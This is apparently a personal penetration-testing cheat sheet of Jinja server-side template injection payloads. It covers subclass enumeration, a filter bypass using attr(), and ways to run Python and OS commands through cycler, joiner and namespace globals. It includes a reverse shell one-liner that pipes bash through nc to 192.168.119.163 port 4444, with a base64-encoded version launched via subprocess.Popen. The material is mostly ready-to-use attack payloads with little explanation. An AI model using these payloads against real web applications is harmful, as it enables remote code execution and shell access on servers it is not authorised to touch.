SSTI

Jinja

Traditional Way

# get all subclasses which returns a list
{{ "".__class__.__mro__[1].__subclasses__() }}

Filter bypass

{% set start = "" %}
{% set class = start|attr("__class__") %}
{% set mro = class|attr("__mro__") %}
{% set subclasses = mro[1]|attr("__subclasses__")() %}

# get all subclasses which returns a list
{{ subclasses }}

Getting a shell

# base64 encode this payload
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.119.163 4444 >/tmp/f

{% set start = "" %}
{% set class = start|attr("__class__") %}
{% set mro = class|attr("__mro__") %}
{% set subclasses = mro[1]|attr("__subclasses__")() %}

# get all subclasses which returns a list
{{ subclasses }}

# find the index of subprocess.Popen, e.g. 1052
{{ subclasses[1052]("echo cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTkyLjE2OC4xMTkuMTYzIDQ0NDQgPi90bXAvZg== | base64 -d | /bin/bash", shell=True) }}

Running Code

Running Python Code

This can be chain to running OS code when request.args.a = import os;os.system('id')

{{namespace['__in''it__'].__builtins__.exec(request.args.a)}}

Running OS code

{{ cycler.__init__.__globals__.os.popen('id').read() }}

{{ joiner.__init__.__globals__.os.popen('id').read() }}

{{ namespace.__init__.__globals__.os.popen('id').read() }}